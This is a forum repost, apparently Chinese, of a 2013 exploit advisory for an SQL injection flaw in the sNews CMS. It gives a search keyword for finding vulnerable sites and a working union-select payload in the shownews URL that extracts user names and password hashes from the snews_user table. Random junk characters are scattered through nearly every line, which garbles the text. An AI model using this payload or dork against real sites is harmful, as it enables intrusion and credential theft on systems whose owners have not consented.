标题: CMS snews SQL Injection Vulnerability2 E" N8 Z* R+ W% r5 L
作者: By onestree* L& b2 n4 c# k9 U3 B
下载地址 : http://snewscms.com/( l5 c2 r( A. {- E" L0 a2 g
测试平台 : ubuntu 12.10 / win 7
' [ q; n0 {* X& ?0 n* r* S, j关键词: inurl:"tanyakan pada rumput yang bergoyang"
( P9 l2 P2 V8 Y% S$ ~; d; O3 c
! x) f9 P) P0 G8 p& w' I0 U6 T5 {
+ I# H: v: W7 f5 X0 k& R*************************************************************4 R8 ^; g2 Y2 Q2 i% T
8 X- Q( T) E* k* U7 MSQL poc:
0 |! e0 Z! e# U$ F5 L4 Y+ I
3 m) D/ W/ `: h+ k$ F2 ]http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
5 `' J" D* L4 j6 T) E
% h# T( W* p$ I: L* E3 V示例
* |3 O- H7 F: O: { ! O- D# t& m5 L, f+ T) c
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*3 } c& { Q9 ?2 H( h
0 \7 F5 Y; V- c0 {: k
: A8 ?; {7 V4 H- ]6 t
致谢:) i, n$ Z$ ]" O4 G) u- ]4 o H# M4 a( J
/ w! ]$ Q# L- C" _1 p* J: B
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
* E0 ~9 ?8 H' M: o0 o( `
; x0 ~# D! ]4 w- A" H indonesiancoder - moeslimh4x0r - go-coder
! o! v. { Y; a5 O# y7 B
7 x8 K0 \8 Q+ @5 H5 ^spesial my hunny :*# @5 C# |1 V5 Y* {' R( M
|
发表于 2013-1-23 08:55:06
收藏
支持
反对